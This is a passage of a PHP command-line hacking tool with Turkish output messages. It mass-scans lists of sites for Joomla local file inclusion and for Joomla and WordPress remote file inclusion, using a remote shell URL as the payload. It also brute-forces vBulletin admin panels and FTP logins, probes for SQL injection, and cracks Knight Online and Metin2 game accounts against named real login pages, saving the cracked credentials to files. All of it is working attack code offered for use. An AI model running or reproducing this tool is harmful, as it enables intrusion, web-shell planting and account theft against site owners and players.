  708. foreach($explode as $sites){
  709. $sites=trim($sites);
  710. $bak_1 = self::curl($sites.$this->lfi_1);
  711. $bak_2 = self::curl($sites.$this->lfi_2);
  712. $bak_3 = self::curl($sites.$this->lfi_3);
  713. $bak_4 = self::curl($sites.$this->lfi_4);
  714. $bak_5 = self::curl($sites.$this->lfi_5);
  715. $bak_6 = self::curl($sites.$this->lfi_6);
  716. $bak_7 = self::curl($sites.$this->lfi_7);
  717. $bak_8 = self::curl($sites.$this->lfi_8);
  718. $bak_9 = self::curl($sites.$this->lfi_9);
  719. $bak_10 = self::curl($sites.$this->lfi_10);
  720. $bak_11 = self::curl($sites.$this->lfi_11);
  721.  
  722. if(eregi($this->lfiregex,$bak_1)){
  723. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
  724.  
  725. ob_flush();
  726. flush();
  727.  
  728. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_1);
  729.  
  730. }
  731. if(eregi($this->lfiregex,$bak_2)){
  732. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
  733.  
  734. ob_flush();
  735. flush();
  736.  
  737. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_2);
  738.  
  739. }
  740. if(eregi($this->lfiregex,$bak_3)){
  741.  
  742. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
  743.  
  744. ob_flush();
  745. flush();
  746.  
  747. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_3);
  748.  
  749. }
  750. if(eregi($this->lfiregex,$bak_4)){
  751.  
  752. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
  753.  
  754. ob_flush();
  755. flush();
  756.  
  757. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_4);
  758.  
  759. }
  760. if(eregi($this->lfiregex,$bak_5)){
  761.  
  762. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
  763.  
  764. ob_flush();
  765. flush();
  766.  
  767. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_5);
  768.  
  769.  
  770. }
  771. if(eregi($this->lfiregex,$bak_6)){
  772.  
  773. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
  774.  
  775. ob_flush();
  776. flush();
  777.  
  778. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_6);
  779.  
  780.  
  781. }
  782. if(eregi($this->lfiregex,$bak_7)){
  783. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
  784.  
  785. ob_flush();
  786. flush();
  787.  
  788. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_7);
  789.  
  790.  
  791. }
  792. if(eregi($this->lfiregex,$bak_8)){
  793. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
  794.  
  795. ob_flush();
  796. flush();
  797.  
  798. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_8);
  799.  
  800. }
  801. if(eregi($this->lfiregex,$bak_9)){
  802. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
  803.  
  804. ob_flush();
  805. flush();
  806.  
  807. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_9);
  808.  
  809. }
  810. if(eregi($this->lfiregex,$bak_10)){
  811.  
  812. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
  813.  
  814. ob_flush();
  815. flush();
  816.  
  817. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_10);
  818. }
  819. if(eregi($this->lfiregex,$bak_11)){
  820. echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
  821.  
  822. ob_flush();
  823. flush();
  824.  
  825. $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_11);
  826.  
  827. }
  828.  
  829.  
  830. }
  831.  
  832. echo "\nJoomla LFI Aramasi bitti";
  833.  
  834. }
  835. public function jomrfi(){
  836. $explode = explode("\n",file_get_contents("joomla.txt"));
  837.  
  838. foreach($explode as $sites){
  839.  
  840. $sites=trim($sites);
  841. $bak_1 = self::curl($sites.$this->rfi_1.$this->shell);
  842. $bak_2 = self::curl($sites.$this->rfi_2.$this->shell);
  843. $bak_3 = self::curl($sites.$this->rfi_3.$this->shell);
  844. $bak_4 = self::curl($sites.$this->rfi_4.$this->shell);
  845. $bak_5 = self::curl($sites.$this->rfi_5.$this->shell);
  846. $bak_6 = self::curl($sites.$this->rfi_6.$this->shell);
  847. $bak_7 = self::curl($sites.$this->rfi_7.$this->shell);
  848. $bak_8 = self::curl($sites.$this->rfi_8.$this->shell);
  849. $bak_9 = self::curl($sites.$this->rfi_9.$this->shell);
  850. $bak_10 = self::curl($sites.$this->rfi_10.$this->shell);
  851. $bak_11 = self::curl($sites.$this->rfi_11.$this->shell);
  852. $bak_12 = self::curl($sites.$this->rfi_12.$this->shell);
  853. $bak_13 = self::curl($sites.$this->rfi_13.$this->shell);
  854. $bak_14 = self::curl($sites.$this->rfi_14.$this->shell);
  855. $bak_15 = self::curl($sites.$this->rfi_15.$this->shell);
  856. $bak_16 = self::curl($sites.$this->rfi_16.$this->shell);
  857. $bak_17 = self::curl($sites.$this->rfi_17.$this->shell);
  858. $bak_18 = self::curl($sites.$this->rfi_18.$this->shell);
  859. $bak_19 = self::curl($sites.$this->rfi_19.$this->shell);
  860. $bak_20 = self::curl($sites.$this->rfi_20.$this->shell);
  861. $bak_21 = self::curl($sites.$this->rfi_21.$this->shell);
  862.  
  863.  
  864. if(eregi($this->shellkey,$bak_1)){
  865.  
  866. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
  867. ob_flush();
  868. flush();
  869.  
  870. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_1.$this->shell);
  871.  
  872. }
  873. if(eregi($this->shellkey,$bak_2)){
  874.  
  875. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
  876. ob_flush();
  877. flush();
  878.  
  879. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_2.$this->shell);
  880.  
  881. }
  882. if(eregi($this->shellkey,$bak_3)){
  883.  
  884. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
  885. ob_flush();
  886. flush();
  887.  
  888. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_3.$this->shell);
  889.  
  890. }
  891. if(eregi($this->shellkey,$bak_4)){
  892.  
  893. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
  894. ob_flush();
  895. flush();
  896.  
  897. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_4.$this->shell);
  898.  
  899. }
  900. if(eregi($this->shellkey,$bak_5)){
  901.  
  902. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
  903. ob_flush();
  904. flush();
  905.  
  906. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_5.$this->shell);
  907.  
  908. }
  909. if(eregi($this->shellkey,$bak_6)){
  910.  
  911. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
  912. ob_flush();
  913. flush();
  914.  
  915. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_6.$this->shell);
  916.  
  917. }
  918. if(eregi($this->shellkey,$bak_7)){
  919.  
  920. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
  921. ob_flush();
  922. flush();
  923.  
  924. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_7.$this->shell);
  925.  
  926. }
  927. if(eregi($this->shellkey,$bak_8)){
  928.  
  929. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
  930. ob_flush();
  931. flush();
  932.  
  933. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_8.$this->shell);
  934.  
  935. }
  936. if(eregi($this->shellkey,$bak_9)){
  937.  
  938. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
  939. ob_flush();
  940. flush();
  941.  
  942. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_9.$this->shell);
  943.  
  944. }
  945. if(eregi($this->shellkey,$bak_10)){
  946.  
  947. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
  948. ob_flush();
  949. flush();
  950.  
  951. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_10.$this->shell);
  952.  
  953. }
  954. if(eregi($this->shellkey,$bak_11)){
  955.  
  956. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
  957. ob_flush();
  958. flush();
  959.  
  960. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_11.$this->shell);
  961.  
  962. }
  963. if(eregi($this->shellkey,$bak_12)){
  964.  
  965. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
  966. ob_flush();
  967. flush();
  968.  
  969. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_12.$this->shell);
  970.  
  971. }
  972. if(eregi($this->shellkey,$bak_13)){
  973.  
  974. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
  975. ob_flush();
  976. flush();
  977.  
  978. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_13.$this->shell);
  979.  
  980. }
  981. if(eregi($this->shellkey,$bak_14)){
  982.  
  983. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
  984. ob_flush();
  985. flush();
  986.  
  987. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_14.$this->shell);
  988.  
  989. }
  990. if(eregi($this->shellkey,$bak_15)){
  991.  
  992. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
  993. ob_flush();
  994. flush();
  995.  
  996. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_15.$this->shell);
  997.  
  998. }
  999. if(eregi($this->shellkey,$bak_16)){
  1000.  
  1001. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
  1002. ob_flush();
  1003. flush();
  1004.  
  1005. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_16.$this->shell);
  1006.  
  1007. }
  1008. if(eregi($this->shellkey,$bak_17)){
  1009.  
  1010. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
  1011. ob_flush();
  1012. flush();
  1013.  
  1014. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_17.$this->shell);
  1015.  
  1016. }
  1017. if(eregi($this->shellkey,$bak_18)){
  1018.  
  1019. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
  1020. ob_flush();
  1021. flush();
  1022.  
  1023. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_18.$this->shell);
  1024.  
  1025. }
  1026. if(eregi($this->shellkey,$bak_19)){
  1027.  
  1028. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
  1029. ob_flush();
  1030. flush();
  1031.  
  1032. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_19.$this->shell);
  1033.  
  1034. }
  1035. if(eregi($this->shellkey,$bak_20)){
  1036.  
  1037. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
  1038. ob_flush();
  1039. flush();
  1040.  
  1041. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_20.$this->shell);
  1042.  
  1043. }
  1044. if(eregi($this->shellkey,$bak_21)){
  1045.  
  1046. echo $sites." -> Joomla RFI Bulundu jomrfi.txt\n";
  1047. ob_flush();
  1048. flush();
  1049.  
  1050. $kaydet = self::kaydet("jomrfi.txt",$sites.$this->rfi_21.$this->shell);
  1051.  
  1052. }
  1053.  
  1054. }
  1055.  
  1056. echo "\nJoomla RFI Aramasi bitti";
  1057.  
  1058. }
  1059.  
  1060. public function wprfi(){
  1061. $explode = explode("\n",file_get_contents("wordpress.txt"));
  1062. foreach($explode as $sites){
  1063.  
  1064. $sites = trim($sites);
  1065. $bak_1 = self::curl($sites.$this->wprfi_1.$this->shell);
  1066. $bak_2 = self::curl($sites.$this->wprfi_2.$this->shell);
  1067. $bak_3 = self::curl($sites.$this->wprfi_3.$this->shell);
  1068. $bak_4 = self::curl($sites.$this->wprfi_4.$this->shell);
  1069. $bak_5 = self::curl($sites.$this->wprfi_5.$this->shell);
  1070. $bak_6 = self::curl($sites.$this->wprfi_6.$this->shell);
  1071. $bak_7 = self::curl($sites.$this->wprfi_7.$this->shell);
  1072. $bak_8 = self::curl($sites.$this->wprfi_8.$this->shell);
  1073. $bak_9 = self::curl($sites.$this->wprfi_9.$this->shell);
  1074. $bak_10 = self::curl($sites.$this->wprfi_10.$this->shell);
  1075.  
  1076. if(eregi($this->shellkey,$bak_1)){
  1077.  
  1078. echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
  1079. ob_flush();
  1080. flush();
  1081.  
  1082. $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_1.$this->shell);
  1083.  
  1084. }
  1085. if(eregi($this->shellkey,$bak_2)){
  1086.  
  1087. echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
  1088. ob_flush();
  1089. flush();
  1090.  
  1091. $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_2.$this->shell);
  1092.  
  1093. }
  1094. if(eregi($this->shellkey,$bak_3)){
  1095.  
  1096. echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
  1097. ob_flush();
  1098. flush();
  1099.  
  1100. $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_3.$this->shell);
  1101.  
  1102. }
  1103. if(eregi($this->shellkey,$bak_4)){
  1104.  
  1105. echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
  1106. ob_flush();
  1107. flush();
  1108.  
  1109. $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_4.$this->shell);
  1110.  
  1111. }
  1112. if(eregi($this->shellkey,$bak_5)){
  1113.  
  1114. echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
  1115. ob_flush();
  1116. flush();
  1117.  
  1118. $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_5.$this->shell);
  1119.  
  1120. }
  1121. if(eregi($this->shellkey,$bak_6)){
  1122.  
  1123. echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
  1124. ob_flush();
  1125. flush();
  1126.  
  1127. $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_6.$this->shell);
  1128.  
  1129. }
  1130. if(eregi($this->shellkey,$bak_7)){
  1131.  
  1132. echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
  1133. ob_flush();
  1134. flush();
  1135.  
  1136. $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_7.$this->shell);
  1137.  
  1138. }
  1139. if(eregi($this->shellkey,$bak_8)){
  1140.  
  1141. echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
  1142. ob_flush();
  1143. flush();
  1144.  
  1145. $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_8.$this->shell);
  1146.  
  1147. }
  1148. if(eregi($this->shellkey,$bak_9)){
  1149.  
  1150. echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
  1151. ob_flush();
  1152. flush();
  1153.  
  1154. $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_9.$this->shell);
  1155.  
  1156. }
  1157. if(eregi($this->shellkey,$bak_10)){
  1158.  
  1159. echo $sites." -> Wordpress RFI Bulundu wprfi.txt\n";
  1160. ob_flush();
  1161. flush();
  1162.  
  1163. $kaydet=self::kaydet("wprfi.txt",$sites.$this->wprfi_10.$this->shell);
  1164.  
  1165. }
  1166.  
  1167.  
  1168. }
  1169.  
  1170. echo "\nWordpress RFI Aramasi bitti";
  1171.  
  1172. }
  1173.  
  1174. public function vbrute_1($url){
  1175.  
  1176. $curl = curl_init();
  1177. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  1178. curl_setopt($curl,CURLOPT_URL,$url.$this->url_7);
  1179. curl_setopt($curl,CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
  1180. curl_setopt($curl,CURLOPT_COOKIEJAR, 'vbcookie.txt');
  1181. curl_setopt($curl,CURLOPT_COOKIEFILE, 'vbcookie.txt');
  1182. $exec=curl_exec($curl);
  1183. curl_close($curl);
  1184. return $exec;
  1185.  
  1186. }
  1187. public function vbrute_2(){
  1188.  
  1189. $password = explode("\n",file_get_contents($this->wordlist));
  1190. foreach($password as $passwords){
  1191. $passwords=trim($passwords);
  1192. $passwords=md5($passwords);
  1193.  
  1194. $explode = explode("\n",file_get_contents("vbulletin.txt"));
  1195.  
  1196. foreach($explode as $sites){
  1197.  
  1198. $sites = trim($sites);
  1199.  
  1200. $hash = self::vbhashAl($sites);
  1201.  
  1202. $url = $sites.$this->url_8;
  1203.  
  1204. $curl=curl_init();
  1205. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  1206. curl_setopt($curl,CURLOPT_URL,$url);
  1207. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  1208. curl_setopt($curl,CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
  1209. curl_setopt($curl,CURLOPT_COOKIEJAR, 'vbcookie.txt');
  1210. curl_setopt($curl,CURLOPT_COOKIEFILE, 'vbcookie.txt');
  1211. curl_setopt($curl,CURLOPT_POST,1);
  1212. curl_setopt($curl,CURLOPT_POSTFIELDS,'url=%2Fadmincp%2F&s='.$hash.'&securitytoken=guest&logintype=cplogin&do=login&vb_login_md5password='.$passwords.'&vb_login_md5password_utf='.$passwords.'&vb_login_username=Admin&vb_login_password=&cssprefs=');
  1213. curl_setopt($curl,CURLOPT_TIMEOUT,25);
  1214. $exec=curl_exec($curl);
  1215. curl_close($curl);
  1216. if(eregi($this->vbreg,$exec)){
  1217.  
  1218. echo $sites." -> vBulletin Panel Girisi bulundu vbrute.txt\n";
  1219. ob_flush();
  1220. flush();
  1221.  
  1222. $kaydet=self::kaydet("vbrute.txt",$sites.$this->url_7);
  1223.  
  1224. }
  1225.  
  1226. }
  1227.  
  1228.  
  1229.  
  1230. }
  1231. @unlink("vbcookie.txt");
  1232. echo "\nvBulletin Brute Force bitti.";
  1233.  
  1234. }
  1235. public function vbhashAl($url){
  1236. $adres=self::vbrute_1($url);
  1237. preg_match_all($this->vbregex,$adres,$s);
  1238. return $s[1][0];
  1239. }
  1240.  
  1241. public function datasql(){
  1242.  
  1243. $explode = explode("\n",file_get_contents("vbulletin.txt"));
  1244.  
  1245. foreach($explode as $siteler){
  1246.  
  1247. $siteler = trim($siteler);
  1248.  
  1249. $login = self::curl($siteler.$this->url_9);
  1250.  
  1251. if(eregi($this->datareg,$login)){
  1252.  
  1253. echo $siteler." -> vBulletin Data SQL Bulundu datasql.txt\n";
  1254.  
  1255. ob_flush();
  1256. flush();
  1257.  
  1258. $kaydet = self::kaydet("datasql.txt",$siteler.$this->url_9);
  1259.  
  1260. }
  1261.  
  1262.  
  1263. }
  1264. echo "\nvBulletin Data SQL Arama bitti";
  1265.  
  1266. }
  1267. public function pagerank(){
  1268.  
  1269. $explode = explode("\n",file_get_contents("reverse.txt"));
  1270.  
  1271. foreach($explode as $siteler){
  1272.  
  1273. $siteler = trim($siteler);
  1274.  
  1275. $curl=curl_init();
  1276. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  1277. curl_setopt($curl,CURLOPT_URL,'http://www.developertutorials.com/tools/google-pagerank-checker.php');
  1278. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 ( .NET CLR 3.5.30729; .NET4.0E)');
  1279. curl_setopt($curl,CURLOPT_POST,1);
  1280. curl_setopt($curl,CURLOPT_POSTFIELDS,'url='.$siteler.'&Submit1=Get+PageRank');
  1281.  
  1282. $exec=curl_exec($curl);
  1283. curl_close($curl);
  1284.  
  1285. $regex = "#<font color='(.*?)'>(.*?)</font>#";
  1286.  
  1287. preg_match_all($regex,$exec,$pr);
  1288. foreach($pr[0] as $pagerank){
  1289.  
  1290. $pagerank = ereg_replace("<font color='#006600'>Google PageRank ","",$pagerank);
  1291. $pagerank = ereg_replace("</font>","",$pagerank);
  1292.  
  1293. echo $siteler." Pagerank ".$pagerank."\n";
  1294. ob_flush();
  1295. flush();
  1296. }
  1297.  
  1298. }
  1299.  
  1300. echo "\nPagerank Check bitti.";
  1301.  
  1302. }
  1303. public function sqlinj(){
  1304.  
  1305. $explode = explode("\n",file_get_contents("reverse.txt"));
  1306.  
  1307. foreach($explode as $sites){
  1308. $sites=trim($sites);
  1309.  
  1310. $gir = self::curl($sites);
  1311.  
  1312. preg_match_all($this->sql,$gir,$link);
  1313.  
  1314. foreach($link[0] as $links){
  1315.  
  1316. if(eregi('id=',$links)){
  1317.  
  1318. $url = $links."%27";
  1319.  
  1320. $login = self::curl($url);
  1321.  
  1322. if(eregi($this->hata[0],$login)){
  1323. echo $sites." -> SQL Syntax bulundu sql.txt\n";
  1324.  
  1325. ob_flush();
  1326. flush();
  1327. $kaydet = self::kaydet("sql.txt",$url);
  1328. }elseif(eregi($this->hata[1],$login)){
  1329. echo $sites." -> MySQL bulundu sql.txt\n";
  1330.  
  1331. ob_flush();
  1332. flush();
  1333. $kaydet = self::kaydet("sql.txt",$url);
  1334. }elseif(eregi($this->hata[2],$login)){
  1335. echo $sites." -> MySQL bulundu sql.txt\n";
  1336.  
  1337. ob_flush();
  1338. flush();
  1339. $kaydet = self::kaydet("sql.txt",$url);
  1340. }elseif(eregi($this->hata[3],$login)){
  1341. echo $sites." -> MySQL bulundu sql.txt\n";
  1342.  
  1343. ob_flush();
  1344. flush();
  1345. $kaydet = self::kaydet("sql.txt",$url);
  1346. }elseif(eregi($this->hata[4],$login)){
  1347. echo $sites." -> Unclosed bulundu sql.txt\n";
  1348.  
  1349. ob_flush();
  1350. flush();
  1351. $kaydet = self::kaydet("sql.txt",$url);
  1352. }
  1353.  
  1354.  
  1355. }
  1356.  
  1357. }
  1358.  
  1359. }
  1360. echo "\nSQL Taramasi bitti.";
  1361. }
  1362.  
  1363. public function ftpbrute($site){
  1364.  
  1365. if(!file_exists("ftp_user.txt")){
  1366. echo "\nLutfen ftp_user.txt ye user listinizi girin";
  1367. exit;
  1368. }elseif(!file_exists("ftp_pass.txt")){
  1369. echo "\nLutfen ftp_pass.txt ye pass listinizi girin";
  1370. exit;
  1371. }
  1372.  
  1373.  
  1374. $users = explode("\n",file_get_contents("ftp_user.txt"));
  1375. $pass = explode("\n",file_get_contents("ftp_pass.txt"));
  1376.  
  1377. foreach($users as $username){
  1378. $username = trim($username);
  1379.  
  1380. foreach($pass as $password){
  1381. $password = trim($password);
  1382.  
  1383.  
  1384. $curl = curl_init();
  1385. curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1386. curl_setopt($curl, CURLOPT_URL, 'ftp://'.$username.':'.$password.'@'.$site.'');
  1387. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  1388. curl_setopt($curl, CURLOPT_FTPLISTONLY,1);
  1389. curl_setopt($curl, CURLOPT_TIMEOUT,15);
  1390. $exec = curl_exec($curl);
  1391. curl_close($curl);
  1392.  
  1393. if(curl_errno($curl)==0){
  1394. echo "Username : ".$username." Password : ".$password." -> FTP Kirildi ftpcracked.txt\n";
  1395. ob_flush();
  1396. flush();
  1397.  
  1398. $kaydet = self::kaydet("ftpcracked.txt","ftp://".$site." User : ".$username." Pass : ".$password."");
  1399. }
  1400.  
  1401. }
  1402.  
  1403. }
  1404.  
  1405.  
  1406. echo "\nFTP Kirma islemi bitti";
  1407.  
  1408. }
  1409.  
  1410.  
  1411.  
  1412. public function kobrute(){
  1413.  
  1414. if(!file_exists("ko_user.txt")){
  1415. echo "\nLutfen ko_user.txt ye user listinizi girin";
  1416. exit;
  1417. }elseif(!file_exists("ko_pass.txt")){
  1418. echo "\nLutfen ko_pass.txt ye pass listinizi girin";
  1419. exit;
  1420. }
  1421. $userler = explode("\n",file_get_contents("ko_user.txt"));
  1422. $passlar = explode("\n",file_get_contents("ko_pass.txt"));
  1423.  
  1424.  
  1425. foreach($userler as $users){
  1426. $users = trim($users);
  1427.  
  1428. foreach($passlar as $passes){
  1429.  
  1430. $curl=curl_init();
  1431. curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
  1432. curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
  1433. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  1434. curl_setopt($curl,CURLOPT_HEADER,0);
  1435. curl_setopt($curl,CURLOPT_URL,'https://gamersfirst.ekolay.net/action/login.php');
  1436. curl_setopt($curl,CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)");
  1437. curl_setopt($curl,CURLOPT_COOKIEJAR,'kocookie.txt');
  1438. curl_setopt($curl,CURLOPT_COOKIEFILE,'kocookie.txt');
  1439. curl_setopt($curl,CURLOPT_POST,1);
  1440. curl_setopt($curl,CURLOPT_POSTFIELDS,'successRedirectUrl=%2F&failureRedirectUrl=%2Flogin.php%3Fretry&loginuser='.$users.'&loginpass='.$passes.'&loginsubmit=');
  1441. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  1442. curl_setopt($curl,CURLOPT_TIMEOUT,10);
  1443.  
  1444. $run=curl_exec($curl);
  1445. curl_close($curl);
  1446.  
  1447. if(eregi('logout.php',$run)){
  1448. echo "Username : ".$users." Password : ".$passes." -> Account Kirildi kocrack.txt\n";
  1449.  
  1450. ob_flush();
  1451. flush();
  1452.  
  1453. $kaydet = self::kaydet("kocrack.txt","Username : ".$users." Password : ".$passes."");
  1454. }
  1455.  
  1456. }
  1457. }
  1458.  
  1459. @unlink("kocookie.txt");
  1460. echo "\nKnight OnLine Crack islemi bitti";
  1461.  
  1462. }
  1463.  
  1464. public function metinbrute(){
  1465.  
  1466. if(!file_exists("metin_user.txt")){
  1467. echo "\nLutfen metin_user.txt ye user listinizi girin";
  1468. exit;
  1469. }elseif(!file_exists("metin_pass.txt")){
  1470. echo "\nLutfen metin_pass.txt ye pass listinizi girin";
  1471. exit;
  1472. }
  1473.  
  1474. $userler = explode("\n",file_get_contents("metin_user.txt"));
  1475. $passlar = explode("\n",file_get_contents("metin_pass.txt"));
  1476.  
  1477. foreach($userler as $users){
  1478.  
  1479. $users = trim($users);
  1480.  
  1481. foreach($passlar as $passes){
  1482. $passes = trim($passes);
  1483.  
  1484. $curl = curl_init();
  1485. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  1486. curl_setopt($curl,CURLOPT_URL,"http://www.metin2.org/user/login");
  1487. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 ( .NET CLR 3.5.30729; .NET4.0E)');
  1488. curl_setopt($curl,CURLOPT_COOKIEJAR,"metincookie.txt");
  1489. curl_setopt($curl,CURLOPT_COOKIEFILE,"metincookie.txt");
  1490. curl_setopt($curl,CURLOPT_POST,1);
  1491. curl_setopt($curl,CURLOPT_POSTFIELDS,"username=".$users."&password=".$passes."");
  1492. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  1493.  
  1494. $run = curl_exec($curl);
  1495. curl_close($curl);
  1496. if(eregi("Hesap Bilgileri",$run)){
  1497. echo "Username : ".$users." Password : ".$passes." -> Account Kirildi metincrack.txt\n";
  1498. ob_flush();
  1499. flush();
  1500.  
  1501. $kaydet = self::kaydet("metincrack.txt","Username : ".$users." Password : ".$passes."");
  1502. }
  1503.  
  1504. }
  1505.  
  1506. }
  1507. @unlink("metincookie.txt");
  1508. echo "\nMetin2 Crack islemi bitti";
  1509.  
  1510.  
  1511. }
  1512.  
  1513. }
  1514.  
  1515.  
  1516.  
  1517.  
  1518.  
  1519. $tool=new H_Tool();
  1520. if($argv[1]==""){
  1521.  
  1522. $tool->ana();
  1523.  
  1524. }
  1525. if($argv[1]=="komutlar"){
  1526. $tool->komutlar();
  1527. }
  1528. if($argv[1]){
  1529. $tool->reverse($argv[1]);
  1530. }
  1531. if($argv[1]=="ayir"){
  1532. echo "\nAraniyor Bekleyin...\n\n";
  1533. ob_flush();
  1534. flush();
  1535. $tool->ayir();
  1536. }
  1537. if($argv[1]=="jomtoken"){
  1538. echo "\nJoomla Token Taraniyor bekleyin\n\n";
  1539. ob_flush();
  1540. flush();
  1541. $tool->token_2();
  1542. }
  1543. if($argv[1]=="jombrute"){
  1544. echo "\nJoomla Brute Force basladi bekleyin\n\n";
  1545. ob_flush();
  1546. flush();
  1547.  
  1548. $tool->jombrute_2();
  1549. }
  1550. if($argv[1]=="wpbrute"){
  1551. echo "\nWordpress Brute Forcer basladi bekleyin\n\n";
  1552. ob_flush();
  1553. flush();
  1554.  
  1555. $tool->wpbrute();
  1556. }
  1557. if($argv[1]=="osreset"){
  1558. echo "\nosCommerce admin reset deneniyor...\n\n";
  1559. ob_flush();
  1560. flush();
  1561.  
  1562. $tool->osc_login();
  1563. }
  1564. if($argv[1]=="shellara"){
  1565. echo "\nShell arama basladi...\n\n";
  1566. ob_flush();
  1567. flush();
  1568.  
  1569. $tool->shellara();
  1570. }
  1571. if($argv[1]=="jomsql"){
  1572. echo "\nJoomla SQL Injection Araniyor...\n\n";
  1573. ob_flush();
  1574. flush();
  1575.  
  1576. $tool->jomsql();
  1577.  
  1578. }
  1579. if($argv[1]=="wpsql"){
  1580. echo "\nWordpress SQL Injection Araniyor...\n\n";
  1581. ob_flush();
  1582. flush();
  1583.  
  1584. $tool->wpsql();
  1585. }
